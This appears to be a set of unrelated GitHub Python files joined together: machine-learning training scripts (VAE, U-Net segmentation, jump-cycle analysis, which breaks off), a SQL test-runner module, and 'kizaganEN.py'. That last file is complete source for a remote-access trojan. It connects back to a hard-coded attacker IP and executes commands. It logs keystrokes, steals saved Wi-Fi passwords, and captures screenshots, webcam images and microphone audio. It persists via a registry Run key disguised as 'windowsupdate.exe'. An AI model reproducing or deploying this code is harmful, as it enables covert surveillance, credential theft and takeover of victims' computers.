            # print(rec.shape)
            if n == 1:
                for r in rec[:2]:
                    # NOTE(review): `im` is not defined in this module — this
                    # line raises NameError; likely a missing image/plotting
                    # library import (see the commented im.imsave below).
                    im.imshow(r.squeeze())
                    # im.imsave('rec.png', r.squeeze()*256)
        # loss = np.mean(np.array(loss))
return 1. | IMath123/imath | Trainer/VAETrainer.py | VAETrainer.py | py | 1,621 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "imath.Trainer.Trainer",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "torch.randn",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "torch.exp",
"line_number": 34,
"usage_type": "call"
}
] |
9487574383 | import os, glob
from sqlalchemy import *
import sqlalchemy.exc
from sqlalchemy.orm import sessionmaker
from parse import *
from lxml import etree
from datetime import datetime, date, time
step_types = {
'given': 0,
'when': 1,
'then': 2
}
curpath = os.path.basename(os.getcwd())
if curpath == 'steps':
os.chdir('..')
if curpath == 'features':
os.chdir('..')
global_vars = dict()
connect_config = dict()
link_config = dict()
try:
exec(open("./settings.py").read(), global_vars)
except FileNotFoundError:
try:
exec(open("../settings.py").read(), global_vars)
except FileNotFoundError:
pass
try:
connect_config = global_vars['connect_config']
link_config = global_vars['link_config']
except:
pass
class TestModule:
def __init__(self, module_name):
self.module_name = module_name
self.results = []
self.connect_list = dict()
def run_predicate_from_file(self, predicate, step_type):
predicate_template = "./features/steps/{step_type}*.sql"
param_value_tmpl = "--!{param}={value}"
predicate_format = predicate_template.format(step_type=step_type)
params = dict()
filename_params = dict()
sql_command = ""
is_sql_command = 0
filename = ""
cmd = ""
decl = 'DECLARE @context XML,\n@table XML,\n'
prms = "\t@context = @context OUTPUT,\n"
prms += "\t@table = @table,\n"
def process_file(fn):
sql_command = ""
is_sql = 0
schema = ""
proc_name = ""
with open(g, 'r') as f:
for line in f:
p = parse(param_value_tmpl, line)
if p != None and len(p.named) > 0:
params[p.named['param']] = p.named['value']
sql_command += line
try:
sql_command = 'EXEC {}.{}'.format(params['schema_name'], params['proc_name'])
schema, proc_name = params['schema_name'], params['proc_name']
except:
is_sql = 1
return sql_command, is_sql, schema, proc_name
for g in glob.iglob(predicate_format):
filename = os.path.basename(os.path.splitext(g)[0])
step_filename = "{0} {1}".format(step_type, predicate)
if filename == step_filename:
cmd, is_sql_command, schema, proc_name = process_file(g)
break
else:
fd = parse(filename, step_filename)
if fd != None and len(fd.named) > 0:
for k in fd.named:
vl = fd.named[k]
decl += "\t@{} NVARCHAR(128) = '{}',\n".format(k, vl)
prms += "\t@{} = @{},\n".format(k, k)
cmd, is_sql_command, schema, proc_name = process_file(g)
break
context = etree.Element("context")
table = etree.SubElement(context, "table")
if self.ctx_table is not None:
for ct in self.ctx_table:
row = etree.SubElement(table, 'row')
for hd in ct.headings:
row.set(hd, ct[hd])
ctx_str = etree.tostring(context)
if len(cmd) > 0:
ctx_str = str(ctx_str.decode("utf-8")).replace("'", "''")
decl = decl[:-2] + "\n\nSET @table = '{}'".format(ctx_str)
try:
decl += "\n\nSET @context = '{}'".format(self.ctx_xml)
except AttributeError:
pass
cmd = decl + "\n\n" + cmd + "\n"
cmd += prms[:-2] if is_sql_command == 0 else ''
cmd += "\n\nSELECT @context AS behave_result"
if params['connect'] in link_config:
params['connect'] = link_config[params['connect']]
engine = create_engine(params['connect'])
maker = sessionmaker(bind=engine)
session = maker()
row = None
trans = session.begin(subtransactions=True)
try:
session.execute("SET DATEFORMAT dmy;")
res = session.execute(text(cmd))
if res.cursor != None:
while 'behave_result' != res.cursor.description[0][0]:
names = [c[0] for c in res.cursor.description]
store_results = []
while 1:
row_raw = res.cursor.fetchone()
if row_raw is None:
break
row = dict(zip(names, row_raw))
store_results.append(row)
self.results.append(store_results)
res.cursor.nextset()
row = res.cursor.fetchone()
res.close()
session.execute('IF @@TRANCOUNT > 0 BEGIN COMMIT END')
except:
print(cmd)
raise
# процедура или скрипт вернули данные
rs_xml = etree.Element("results")
rs_xml.set('step_type', step_type)
rs_xml.set('predicate', predicate)
for res_set in self.results:
rset_xml = etree.SubElement(rs_xml, "result_set")
for res_row in res_set:
rrow_xml = etree.SubElement(rset_xml, "row")
for res_col in res_row:
res_col4xml = 'empty' if len(res_col) == 0 else res_col
rrow_xml.set(res_col4xml, str(res_row[res_col]))
session.close()
if row != None:
if row[0] is None:
ctx_out_xml = etree.Element("context")
else:
ctx_out_xml = etree.XML(row[0])
ctx_out_xml.append(rs_xml)
return etree.tostring(ctx_out_xml).decode('utf-8')
return None
| AlexandrMov/sqlbehave | sqlbehave/testmodule.py | testmodule.py | py | 5,971 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.basename",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "os.getcwd",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "os.chdir",
"line_number":... |
1858113091 | import subprocess
import os
import simplejson
import base64
import socket
from util import kg
import time
import threading
import pyttsx3
from PIL import ImageGrab
import sys
import shutil
import cv2
from util import sound_record
import tkinter
ip = "192.168.1.105" #Change this value according to yourself.
port = 4444 #Change this value according to yourself.
my_thread = threading.Thread(target=kg.kg_Start)
my_thread.start()
class mySocket():
def __init__(self,ip,port):
self.connection = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.connection.connect((ip,port))
self.kg_file = os.environ["appdata"]+"\\windowslogs.txt"
self.tro_file = os.environ["appdata"]+"\\windowsupdate.exe"
self.ss_file = os.environ["appdata"]+"\\update.png"
self.camera_file = os.environ["appdata"]+"\\windowsupdate.png"
self.sound_file = os.environ["appdata"]+"\\windowssounds.wav"
self.Mic_Question()
self.Chat_Port_Question()
def Mic_Question(self):
question_answer = self.Get_Json()
if question_answer == "Y" or question_answer == "y":
my_thread2 = threading.Thread(target=self.Start_Record)
my_thread2.start()
def Chat_Port_Question(self):
question_answer = self.Get_Json()
if question_answer == 5555:
self.chat_port = 5555
else:
self.chat_port = question_answer
def Execute_Command(self,command):
command_output = subprocess.check_output(command,shell=True)
return command_output.decode("Latin1")
def Send_Json(self,data):
json_data = simplejson.dumps(data)
self.connection.send(json_data.encode("utf-8"))
def Get_Json(self):
json_data = ""
while True:
try:
json_data = json_data + self.connection.recv(1048576).decode()
return simplejson.loads(json_data)
except ValueError:
continue
def Get_File_Contents(self, path):
with open(path, "rb") as file:
return base64.b64encode(file.read())
def Save_File(self, path, content):
with open(path, "wb") as file:
file.write(base64.b64decode(content))
return "[+]The file was uploaded on victim's current directory."
def Execute_cd(self, path):
os.chdir(path)
return "[+]Changed directory to : " + path
def Make_Directory(self, file_name):
os.mkdir(file_name)
return "[+]Directory created : " + file_name
def Remove_Directory(self, file_name):
os.rmdir(file_name)
return "[+]Directory removed : " + file_name
def Remove_File(self, name):
os.remove(name)
return "[+]Removed : " + name
def Rename_File(self, name1, name2):
os.rename(name1, name2)
return "[+]Name changed.\n" + name1 + "→→→→→→" + name2
def Open_File(self, file_name):
os.system(file_name)
return "[+]The file opened on victim's computer. : " + file_name
def Pwd(self):
return os.getcwd()
def Check(self):
if os.name == 'nt':
return "Victim is a windows."
elif os.name == 'posix':
return "Victim is a linux distribution"
def Kg_Start_Func(self):
kg.kg_Start()
def Read_Kg(self):
with open(self.kg_file, "r",encoding="utf-8") as file:
return file.read()
def Talk(self,words):
engine = pyttsx3.init()
engine.setProperty("rate", 120)
engine.say(words)
engine.runAndWait()
return "[+]The sound played on victim's computer."
def Permanance(self):
if os.path.exists(self.tro_file):
return "[+]Permanance is activated already."
if not os.path.exists(self.tro_file):
shutil.copyfile(sys.executable, self.tro_file)
regedit_command = "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v windowsupdate /t REG_SZ /d " + self.tro_file
subprocess.call(regedit_command,shell=True)
return "[+]Permanance activated."
def Remove_Permanance(self):
if os.path.exists(self.tro_file):
regedit_command = "reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v windowsupdate /f"
subprocess.call(regedit_command,shell=True)
os.remove(self.tro_file)
return "[+]Permanance removed and it will not work every time the victim boots up his computer."
else:
return "[+]Permanance not found."
def Start_Record(self):
self.start = sound_record.Recording()
self.start.Start_Record()
def Chat_Send_Messages(self):
message = self.client_message_entry.get()
self.messages.insert(tkinter.END, "\n" + "You:" + message)
self.chat_connection.send(message.encode())
self.messages.see("end")
def Chat_Get_Messages(self):
while True:
message = self.chat_connection.recv(1024).decode()
if message == "exit":
self.chat_gui.destroy()
self.messages.insert(tkinter.END, "\n" + "Hacker:" + message)
self.messages.see("end")
def Chat(self):
self.chat_connection = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.chat_connection.connect((ip,self.chat_port))
self.chat_gui = tkinter.Tk()
self.chat_gui.resizable(False, False)
self.chat_gui.config(bg="#D9D8D7")
self.chat_gui.geometry("600x300")
self.chat_gui.title("You are chatting with hacker.")
self.messages = tkinter.Text(self.chat_gui, width=71, height=10, fg="#0E6B0E", bg="#000000")
self.messages.place(x=0, y=0)
self.messages.insert("1.0","Hacker wants to chat with you.Write your message 'your message' part and click the 'Send Message'.")
self.your_message_label = tkinter.Label(self.chat_gui, width=20, text="Your Message :", fg="#0D1C6E")
self.your_message_label.place(x=-30, y=250)
self.client_message_entry = tkinter.Entry(self.chat_gui, width=50)
self.client_message_entry.place(x=90, y=250)
self.send_button = tkinter.Button(self.chat_gui, width=20, text="Send Message", command=self.Chat_Send_Messages, bg="#000000", fg="#0E6B0E")
self.send_button.place(x=400, y=245)
self.chat_thread = threading.Thread(target=self.Chat_Get_Messages)
self.chat_thread.start()
self.chat_gui.mainloop()
def Client_Start(self):
while True:
command = self.Get_Json()
try:
if command[0] == "cd" and len(command) > 1:
command_output = self.Execute_cd(command[1])
elif command[0] == "download":
command_output = self.Get_File_Contents(command[1])
elif command[0] == "upload":
command_output = self.Save_File(command[1], command[2])
elif command[0] == "mkdir":
command_output = self.Make_Directory(command[1])
elif command[0] == "rmdir":
command_output = self.Remove_Directory(command[1])
elif command[0] == "rm":
command_output = self.Remove_File(command[1])
elif command[0] == "rename":
command_output = self.Rename_File(command[1], command[2])
elif command[0] == "open":
command_output = self.Open_File(command[1])
elif command[0] == "pwd":
command_output = self.Pwd()
elif command[0] == "system":
command_output = self.Check()
elif command[0] == "read_kg":
command_output = self.Read_Kg()
elif command[0] == "talk":
command_output = self.Talk(command[1:])
elif command[0] == "show_wifis":
wifis = subprocess.check_output(["netsh", "wlan", "show", "profiles"]).decode()
wifi = wifis.split("\n")
profiles = [i.split(":")[1][1:-1] for i in wifi if "All User Profile" in i]
profile_str = " ".join(profiles)
command_output = "Wifi Networks : \n\n\n"
command_output +=profile_str + "\n\n\n"
command_output += "Wifi passwords(in order of) :\n\n"
for i in profiles:
try:
result = subprocess.check_output(["netsh", "wlan", "show", "profile", i, "key=clear"]).decode("utf-8").split("\n")
result = [b.split(":")[1][1:-1] for b in result if "Key Content" in b]
result_str = " ".join(result)
if result_str == "":
result_str = "No password"
command_output += "\t" + result_str
except subprocess.CalledProcessError:
print("Error.")
elif command[0] == "get_ss":
ImageGrab.grab().save(self.ss_file)
command_output=self.Get_File_Contents(self.ss_file)
os.remove(self.ss_file)
elif command[0] == "save_kg":
command_output = self.Get_File_Contents(self.kg_file)
os.remove(self.kg_file)
elif command[0] == "permanance":
command_output = self.Permanance()
elif command[0] == "remove_permanance":
command_output = self.Remove_Permanance()
elif command[0] == "get_camera_image":
camera = cv2.VideoCapture(0)
result, image = camera.read()
if result:
cv2.imwrite(self.camera_file,image)
command_output = self.Get_File_Contents(self.camera_file)
os.remove(self.camera_file)
else:
command_output = "[-]Can not reach the camera."
elif command[0] == "download_sound_recording":
self.start.Stop_Record()
command_output = self.Get_File_Contents(self.sound_file)
os.remove(self.sound_file)
elif command[0] == "chat":
self.Chat()
else:
command_output = self.Execute_Command(command)
except Exception:
command_output = "Unknown command.For command list use 'help' command."
self.Send_Json(command_output)
self.connection.close()
def Try_Connection():
while True:
time.sleep(5)
try:
mysocket = mySocket(ip,port)
mysocket.Client_Start()
except Exception:
Try_Connection()
def Permanance():
tro_file = os.environ["appdata"] + "\\windowsupdate.exe"
regedit_command = "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v windowsupdate /t REG_SZ /d " + tro_file
if not os.path.exists(tro_file):
shutil.copyfile(sys.executable,tro_file)
subprocess.call(regedit_command,shell=True)
if os.path.exists(tro_file):
pass
def Open_Added_File():
added_file = sys._MEIPASS + "\\examplefile.pdf" #Enter the file after '\\' to combine with image,pdf etc.
subprocess.Popen(added_file,shell=True)
#Open_Added_File() # And remove the '#' before the code.(If you activated it.)
Permanance()
Try_Connection()
| st4inl3s5/kizagan | kizaganEN.py | kizaganEN.py | py | 11,980 | python | en | code | 72 | github-code | 36 | [
{
"api_name": "threading.Thread",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "util.kg.kg_Start",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "util.kg",
"line_number": 20,
"usage_type": "name"
},
{
"api_name": "socket.socket",
"l... |
16931221429 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Jan 24 23:39:39 2018
@author: yorklk
"""
import os
import numpy as np
from skimage.morphology import label
from keras.models import Model, load_model
from keras.layers import Input, Activation, Add, BatchNormalization
from keras.layers.core import Dropout
from keras.layers.convolutional import Conv2D, Conv2DTranspose
from keras.layers.pooling import MaxPooling2D
from keras.layers.merge import concatenate
from keras.callbacks import EarlyStopping, ModelCheckpoint
from keras.preprocessing.image import ImageDataGenerator
from keras.optimizers import Adam
from keras.applications.mobilenet import MobileNet
import keras.backend as KB
import tensorflow as tf
# Pre-resized (128x128) image/mask arrays produced by an earlier preprocessing step.
X_train = np.load('data/X_128.npy')
Y_train = np.load('data/Y_128.npy')
X_test = np.load('data/test_128.npy')
np.random.seed(seed = 71)  # fixed seed so shuffling/fold assignment is reproducible

# Training hyper-parameters.
epochs = 500
learning_rate = 1e-3
learning_rates = [1e-3]  # grid of learning rates swept by the top-level loop
decay = 5e-5             # Adam learning-rate decay
patience = 15            # early-stopping patience (epochs)
dropout_rate = 0.015
batch_size = 8
K=4  # number of cross-validation folds

# Data-augmentation settings forwarded to keras ImageDataGenerator.
pre_proc = dict(horizontal_flip = True,
                vertical_flip = True,
                width_shift_range = 0.1,
                height_shift_range = 0.1,
                channel_shift_range= 0.0,
                zoom_range = 0.0,
                rotation_range = 0.0)
####################################################################
# Precision helper function
def precision_at(threshold, iou):
    """Count TP/FP/FN object matches at one IoU threshold.

    A ground-truth object is a true positive when exactly one prediction
    matches it above `threshold`; a prediction that matches nothing is a
    false positive; a ground-truth object matched by nothing is a false
    negative.
    """
    hits = iou > threshold
    row_hits = np.sum(hits, axis=1)   # matches per ground-truth object
    col_hits = np.sum(hits, axis=0)   # matches per predicted object
    tp = np.sum(row_hits == 1)
    fp = np.sum(col_hits == 0)
    fn = np.sum(row_hits == 0)
    return tp, fp, fn
def iou_metric(y_true_in, y_pred_in):
    """Mean average precision over IoU thresholds 0.5..0.95 for one mask pair.

    Connected components of the binarised masks are treated as objects and
    precision is averaged over ten IoU thresholds (the DSB2018 metric).
    """
    true_cc = label(y_true_in > 0.5)
    pred_cc = label(y_pred_in > 0.5)
    n_true = len(np.unique(true_cc))
    n_pred = len(np.unique(pred_cc))

    # Pairwise intersection area between every (true, pred) component pair.
    intersection = np.histogram2d(true_cc.flatten(), pred_cc.flatten(),
                                  bins=(n_true, n_pred))[0]

    # Per-component areas, broadcast into a pairwise union matrix.
    area_true = np.expand_dims(np.histogram(true_cc, bins=n_true)[0], -1)
    area_pred = np.expand_dims(np.histogram(pred_cc, bins=n_pred)[0], 0)
    union = area_true + area_pred - intersection

    # Drop the background component (label 0) and guard against /0.
    intersection = intersection[1:, 1:]
    union = union[1:, 1:]
    union[union == 0] = 1e-9
    iou = intersection / union

    precisions = []
    for t in np.arange(0.5, 1.0, 0.05):
        tp, fp, fn = precision_at(t, iou)
        denom = tp + fp + fn
        precisions.append(tp / denom if denom > 0 else 0)
    return np.mean(precisions)
def iou_metric_batch(y_true_in, y_pred_in):
    """Average iou_metric over the leading (batch) axis of two mask arrays."""
    scores = [iou_metric(y_true_in[b], y_pred_in[b])
              for b in range(y_true_in.shape[0])]
    return np.array(np.mean(scores), dtype=np.float32)
def my_iou_metric(label, pred):
    """Batch IoU wrapper with a Keras-metric style (y_true, y_pred) signature."""
    return iou_metric_batch(label, pred)
#########################################################################################################
def identity_block(X, filters, dropout_rate):
    """Three stacked Conv/BN/ELU/Dropout units: 3x3, 3x3, then a 1x1 projection."""
    F1, F2, F3 = filters

    def _unit(tensor, n_filters, kernel, padding):
        # One conv -> batch-norm -> ELU -> dropout stage.
        tensor = Conv2D(n_filters, kernel, strides=(1, 1), padding=padding)(tensor)
        tensor = BatchNormalization(axis=3)(tensor)
        tensor = Activation('elu')(tensor)
        return Dropout(rate=dropout_rate)(tensor)

    X = _unit(X, F1, (3, 3), 'same')
    X = _unit(X, F2, (3, 3), 'same')
    X = _unit(X, F3, (1, 1), 'valid')
    return X
def deconvolution_block(X, filters, dropout_rate):
    """ResNet-style upsampling block.

    Main path: 2x Conv2DTranspose unit, a 3x3 conv unit, then a 1x1
    projection (no activation before the merge).  Shortcut path: a 2x
    Conv2DTranspose projection of the input.  The two are summed, then
    ELU-activated and dropped out.
    """
    F1, F2, F3 = filters
    shortcut = X

    # Main path: learned 2x upsampling ...
    main = Conv2DTranspose(F1, (2, 2), strides=(2, 2), padding='same')(X)
    main = BatchNormalization(axis=3)(main)
    main = Activation('elu')(main)
    main = Dropout(rate=dropout_rate)(main)
    # ... a 3x3 conv unit ...
    main = Conv2D(F2, (3, 3), strides=(1, 1), padding='same')(main)
    main = BatchNormalization(axis=3)(main)
    main = Activation('elu')(main)
    main = Dropout(rate=dropout_rate)(main)
    # ... then a 1x1 projection, activation deferred until after the merge.
    main = Conv2D(F3, (1, 1), strides=(1, 1), padding='valid')(main)
    main = BatchNormalization(axis=3)(main)

    # Shortcut path: match the main path's spatial size and channel count.
    shortcut = Conv2DTranspose(F3, (2, 2), strides=(2, 2), padding='same')(shortcut)
    shortcut = BatchNormalization(axis=3)(shortcut)

    merged = Add()([shortcut, main])
    merged = Activation('elu')(merged)
    return Dropout(rate=dropout_rate)(merged)
def uNet_Model(input_shape = (128, 128, 3), dropout_rate = dropout_rate):
    '''
    U-Net with MobileNet (pretrained on ImageNet) as the downsampling side.

    Skip activations are taken from five MobileNet layers (conv_pw_1,
    conv_pw_3, conv_pw_5, conv_pw_11, conv_pw_13) and added to the matching
    upsampling stages; ResNet-style deconvolution blocks with
    Conv2DTranspose and ELU form the upsampling side.

    Parameters
    ----------
    input_shape : tuple
        Input image shape (height, width, channels).
    dropout_rate : float
        Dropout rate used inside every conv/deconv unit.

    Returns
    -------
    keras Model mapping images to a single-channel sigmoid mask.
    '''
    # Fix: the input_shape parameter was previously ignored (hard-coded).
    base_model = MobileNet(weights='imagenet',
                           include_top=False,
                           input_shape=input_shape)
    # Skip connections from five downsampling stages (sizes for 128x128 input).
    X1 = base_model.get_layer('conv_pw_1_relu').output   # 64x64, 64 filters
    X2 = base_model.get_layer('conv_pw_3_relu').output   # 32x32, 128 filters
    X3 = base_model.get_layer('conv_pw_5_relu').output   # 16x16, 256 filters
    X4 = base_model.get_layer('conv_pw_11_relu').output  # 8x8, 512 filters
    X5 = base_model.get_layer('conv_pw_13_relu').output  # 4x4, 1024 filters
    # Bottom block with a residual add.
    X = identity_block(X5, filters=[256, 256, 1024], dropout_rate=dropout_rate)  # 4x4
    X = Add()([X, X5])
    # Upsampling stages, each followed by its skip connection.
    X = deconvolution_block(X, filters=[128, 128, 512], dropout_rate=dropout_rate)  # 8x8
    X = Add()([X, X4])
    X = deconvolution_block(X, filters=[64, 64, 256], dropout_rate=dropout_rate)  # 16x16
    X = Add()([X, X3])
    X = deconvolution_block(X, filters=[32, 32, 128], dropout_rate=dropout_rate)  # 32x32
    X = Add()([X, X2])
    X = deconvolution_block(X, filters=[16, 16, 64], dropout_rate=dropout_rate)  # 64x64
    X = Add()([X, X1])
    # Final upsample back to the input resolution.
    X = deconvolution_block(X, filters=[16, 16, 64], dropout_rate=dropout_rate)  # 128x128
    predictions = Conv2D(1, (1, 1), activation='sigmoid')(X)
    # Fix: `input=` / `output=` are deprecated Model kwargs; the supported
    # keyword names are `inputs` / `outputs`.
    model = Model(inputs=base_model.input, outputs=predictions)
    return model
#####################################################################################################
def train_uNet(X_train_cv, Y_train_cv, X_dev, Y_dev, parameters, batch_size, train_generator, file_path):
    """Compile and fit the U-Net on one CV fold.

    Uses Adam with the fold's learning rate/decay, early stopping on
    val_loss, and a ModelCheckpoint that keeps the best weights at
    `file_path`.  Returns the last-epoch model; the best weights must be
    reloaded from `file_path` by the caller (see get_metrics).
    """
    model = uNet_Model(input_shape=(128, 128, 3), dropout_rate=parameters['dropout_rate'])
    model.compile(loss='binary_crossentropy',
                  optimizer=Adam(lr=parameters['learning_rate'], decay=parameters['decay']),
                  metrics=['accuracy'])
    model.fit_generator(generator=train_generator,
                        steps_per_epoch=int(X_train_cv.shape[0] / batch_size),
                        epochs=epochs,
                        shuffle=True,
                        verbose=2,
                        validation_data=(X_dev, Y_dev),
                        # Fix: validation_steps must be sized from the dev
                        # split; it was computed from X_train_cv.
                        validation_steps=int(X_dev.shape[0] / batch_size),
                        callbacks=[EarlyStopping('val_loss', patience=parameters['patience'], mode="min"),
                                   ModelCheckpoint(file_path, save_best_only=True)])
    return model
def get_folds(X_train, Y_train, K):
    """Shuffle the data once, then return K [X_tr, Y_tr, X_dev, Y_dev] folds.

    Fold j's dev split is the j-th contiguous slice of length m // K of the
    shuffled data; its train split is everything else.
    """
    m = X_train.shape[0]
    order = list(np.random.permutation(m))
    X_shuffled = X_train[order, :, :, :]
    Y_shuffled = Y_train[order, :, :, :]
    fold_length = int(m / K)

    folds = []
    for j in range(K):
        dev_idx = list(range(j * fold_length, (j + 1) * fold_length))
        train_idx = (list(range(0, j * fold_length)) +
                     list(range((j + 1) * fold_length, m)))
        folds.append([X_shuffled[train_idx, :, :, :],
                      Y_shuffled[train_idx, :, :, :],
                      X_shuffled[dev_idx, :, :, :],
                      Y_shuffled[dev_idx, :, :, :]])
    return folds
def get_file_path(j, parameters, directory):
    """Print the fold header and return the checkpoint path for fold `j`,
    creating `directory` if it does not exist yet.

    `parameters` must contain 'learning_rate', 'dropout_rate' and 'aug'.
    """
    print('\nFold:\t{}\nlearning_rate:\t{learning_rate}\ndropout_rate:\t{dropout_rate}\naugmentation:\t{aug}'.format(str(j), **parameters))
    # exist_ok avoids the check-then-create race of the original
    # `if not os.path.exists(...): os.makedirs(...)` guard.
    os.makedirs(directory, exist_ok=True)
    file_path = directory + '/weights_' + str(j) + '.hdf5'
    return file_path
def rename_weight_path(j, metrics, file_path, directory):
    """Print fold metrics, then rename the fold checkpoint so its filename
    records the dev loss and IoU (4 significant digits each).

    `metrics` must contain 'train_loss', 'dev_loss', 'IoU' and 'hdf5'.
    """
    summary = '\nFold:\t{}\nTrain Loss:\t{train_loss:.4}\nDev Loss:\t{dev_loss:.4}\nMean IoU:\t{IoU:.4}\n'
    print(summary.format(str(j), **metrics))
    tagged_name = '{}_{}_{dev_loss:.4}_{IoU:.4}{hdf5}'.format('/weights', str(j), **metrics)
    os.rename(file_path, directory + tagged_name)
    return
def print_final_metrics(parameters, metrics, directory):
    """Print the run summary, then tag the run directory with its averaged
    dev loss and mean IoU (6 significant digits each)."""
    print('\n\nlearning_rate: {learning_rate}\ndropout_rate: {dropout_rate}\naugmentation: {aug}'.format(**parameters))
    print('avg_dev_loss:\t{avg_dev_loss}\nmean_IoU:\t{IoU_log}\n\n\n'.format(**metrics))
    tag = 'loss={avg_dev_loss:.6}_IoU={IoU_log:.6}'.format(**metrics)
    os.rename(directory, directory + '--' + tag)
    return
def get_metrics(model, X_train_cv, Y_train_cv, X_dev, Y_dev, file_path, metrics):
    """Reload the best checkpoint for this fold and update the running
    metrics dict with the fold's train/dev loss and dev-set mean IoU.

    Running averages ('avg_dev_loss', 'IoU_log') accumulate value / K so the
    totals equal the mean over all K folds.
    """
    K = metrics['K']
    model.load_weights(filepath=file_path)

    # Losses on both splits from the restored best weights.
    metrics['train_loss'] = model.evaluate(X_train_cv, Y_train_cv, verbose=0)[0]
    metrics['dev_loss'] = model.evaluate(X_dev, Y_dev, verbose=0)[0]
    metrics['avg_dev_loss'] += metrics['dev_loss'] / K

    # Mean IoU of the binarised dev predictions.
    dev_masks = model.predict(X_dev) >= 0.5
    fold_iou = my_iou_metric(Y_dev, dev_masks)
    metrics['IoU'] = fold_iou
    metrics['IoU_log'] += fold_iou / K
    return metrics
############################################################################
for learning_rate in learning_rates:
    # Build a human-readable augmentation tag for the run directory.
    # Fix: the original passed `aug` itself as the positional .format()
    # argument, so the tag names ('shift', 'zoom', ...) never appeared in
    # the directory name.
    aug = ''
    if pre_proc['width_shift_range'] != 0.0:
        aug += '_{}={width_shift_range}'.format('shift', **pre_proc)
    if pre_proc['zoom_range'] != 0.0:
        aug += '_{}={zoom_range}'.format('zoom', **pre_proc)
    if pre_proc['rotation_range'] != 0.0:
        aug += '_{}={rotation_range}'.format('rotation', **pre_proc)
    if pre_proc['horizontal_flip']:
        aug += '_{}={horizontal_flip}'.format('h-flip', **pre_proc)
    if pre_proc['vertical_flip']:
        aug += '_{}={vertical_flip}'.format('v-flip', **pre_proc)
    parameters = {'learning_rate': learning_rate, 'dropout_rate': dropout_rate,
                  'aug': aug, 'decay': decay, 'patience': patience}
    directory = 'model_5/{learning_rate}_{dropout_rate}/{aug}'.format(**parameters)
    metrics = {'train_loss': 0, 'dev_loss': 0, 'avg_dev_loss': 0, 'IoU': 0,
               'IoU_log': 0, 'K': K, 'hdf5': '.hdf5'}

    # Image and mask generators for on-the-fly augmentation.
    # Fix: both flows must share a seed so the random transforms (flips,
    # shifts) stay aligned between each image and its mask.
    image_datagen = ImageDataGenerator(**pre_proc)
    mask_datagen = ImageDataGenerator(**pre_proc)
    image_datagen.fit(X_train, augment=True)
    mask_datagen.fit(Y_train, augment=True)
    image_generator = image_datagen.flow(X_train, batch_size=batch_size, seed=71)
    mask_generator = mask_datagen.flow(Y_train, batch_size=batch_size, seed=71)
    train_generator = zip(image_generator, mask_generator)

    # Cross-validated training: one model per fold.
    folds = get_folds(X_train, Y_train, K)
    for j in range(K):
        X_train_cv, Y_train_cv, X_dev, Y_dev = folds[j]
        file_path = get_file_path(j, parameters, directory)
        model = train_uNet(X_train_cv, Y_train_cv, X_dev, Y_dev, parameters, batch_size,
                           train_generator, file_path)
        metrics = get_metrics(model, X_train_cv, Y_train_cv, X_dev, Y_dev, file_path, metrics)
        rename_weight_path(j, metrics, file_path, directory)
    print_final_metrics(parameters, metrics, directory)
| yorklk/dsb2018-U-Net | U-Net.py | U-Net.py | py | 13,208 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.load",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "numpy.load",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "numpy.load",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "numpy.random.seed",
"line_number... |
8293997114 | # -*- coding: utf-8 -*-
"""
Created on Fri Sep 17 13:44:46 2021
@author: bfeng1
"""
import json
import sys
import matplotlib.pyplot as plt
import seaborn as sns
import pandas as pd
import numpy as np
from scipy.signal import savgol_filter
from sklearn.utils import resample
from sklearn.metrics import accuracy_score
from sklearn.metrics import confusion_matrix
from scipy.stats import mode
from scipy.spatial.distance import squareform
from sklearn.preprocessing import LabelEncoder
from sklearn.model_selection import train_test_split
#%%
class jump:
    """One recorded jump session.

    Loads the session's joint-angle CSV, snaps manually-selected jump-cycle
    boundaries to local maxima, and resamples every cycle to a fixed length
    for time-series classification.
    """

    n = 135  # samples per resampled jump cycle
    r = 5    # +/- search radius (frames) when finetuning cycle boundaries

    def __init__(self, name, jump_cycle):
        self.name = name              # CSV base name under csv_files/
        self.jump_cycle = jump_cycle  # list of [start, end] frame pairs

    def csv2df(self):
        """Load and clean this session's CSV.

        Returns a DataFrame with a 'left angle ratio' column (Angle1/Angle3)
        and its Savitzky-Golay smoothed version in 'smoothed'.
        """
        csv_file = 'csv_files/' + self.name + '.csv'
        df = pd.read_csv(csv_file)
        # Drop frames with implausible pose estimates (ratio outside 0.75-2.25).
        df['left angle ratio'] = df['Angle1'] / df['Angle3']
        df.drop(df[df['left angle ratio'] > 2.25].index, inplace=True)
        df.drop(df[df['left angle ratio'] < 0.75].index, inplace=True)
        df['smoothed'] = savgol_filter(df['left angle ratio'], 25, 2)
        return df

    def finetune(self):
        """Snap each manually-picked cycle boundary to the local maximum of
        the angle ratio within +/- r frames; returns the adjusted cycles."""
        df = self.csv2df()  # fix: was the unidiomatic jump.csv2df(self)
        jump_cycle = self.jump_cycle
        new_results = []
        for domain in jump_cycle:
            current_list = []
            for inx in domain:
                window = df[inx - jump.r:inx + jump.r]
                max_val = window['left angle ratio'].max()
                ind = window[window['left angle ratio'] == max_val].index.values.astype(int)
                try:
                    ind = ind[0]
                except IndexError:  # fix: was a bare except; only an empty match is expected
                    ind = 0
                current_list.append(ind)
            new_results.append(current_list)
        # fix: replaced `check is False` / `check is True` identity tests.
        if jump_cycle == new_results:
            print('The jump cycle has been finetuned')
        else:
            print('old cycle {}: {}'.format(self.name, jump_cycle))
            print('new cycle {}: {}'.format(self.name, new_results))
        return new_results

    def resample_df(self):
        """Resample every jump cycle to exactly n rows.

        Returns a list of index-reset DataFrames, one per cycle.
        """
        df_list = []
        df = self.csv2df()
        for start, end in self.jump_cycle:
